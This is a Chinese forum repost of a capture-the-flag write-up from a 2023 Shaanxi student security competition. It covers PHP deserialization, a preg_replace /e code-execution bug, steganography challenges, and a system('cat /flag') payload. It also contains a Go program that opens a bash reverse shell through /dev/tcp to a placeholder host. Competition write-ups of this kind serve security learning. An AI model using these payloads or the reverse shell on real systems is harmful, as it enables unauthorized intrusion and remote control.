ToB企服应用市场:ToB评测及商务社交产业平台

标题: 2023陕西省大学生信息安全竞赛web writeup [打印本页]
作者: 熊熊出没    时间: 2023-6-5 16:39
标题: 2023陕西省大学生信息安全竞赛web writeup
前言

早写好了,忘发了,题目质量还行,够我坐大牢
ezpop

简单的反序列化,exp如下
  1. [/code]传参这有个坑,用了Unicode编码,得copy下来进行url编码才能传参,不知道这么干有什么意义,还得绕过Exception,把变量数改一下就能绕过了,跟绕wakeup一样
  2. [size=4]ezrce[/size]
  4. preg_replace采用了/e的模式,很明显有rce漏洞,简单的测试了一下,不能用数字等等,这waf有点牛逼,采用无参rce直接读flag就行了,name得含有hahaha
  5. [img]https://pic.imgdb.cn/item/647d49c21ddac507cc338283.jpg[/img]
  6. [size=4]unserialize[/size]
  8. 非预期,?a=system ('cat /flag');就能读flag
  9. [img]https://pic.imgdb.cn/item/647d49de1ddac507cc33a766.jpg[/img]
  10. [size=4]test[/size]
  12. 查看页面源代码,发现/profile/index这个路由,访问一下返回一个result,啥也没有,仿问/profile/admin,返回了密码,MD5解密一下asdfgh123admin登录进去,提示上传个go文件,就会运行,构造一个上传数据包,go文件如下:
  13. [code]package main
  15. import (
  16.   "fmt"
  17.   "log"
  18.   "os/exec"
  19. )
  21. func main() {
  22.   cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  23.   out, err := cmd.CombinedOutput()
  24.   if err != nil {
  25.     fmt.Printf("combined out:\n%s\n", string(out))
  26.     log.Fatalf("cmd.Run() failed with %s\n", err)
  27.   }
  28.   fmt.Printf("combined out:\n%s\n", string(out))
  29. }
复制代码
反弹shell,拿到flag

Misc

管道

zsteg -a 管道.png | grep "flag"

可是雪啊飘进双眼

第一步hint.wav,藏了摩斯密码,解密出来是WOAISHANXI ,snow.txt,snow解密,snow.exe -p WOAISHANXI -C snow.txt ,拿到密码shanxiroujiamo,解开压缩包,两张图片,key.jpg与hide.jpg, binwalk -e key.jpg 提取出一个压缩包,里面有张图片,跟key.jpg的密文相对应,一一对照拿到密码BC1PVEYD, steghide解hide.jpg即可拿到flag


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4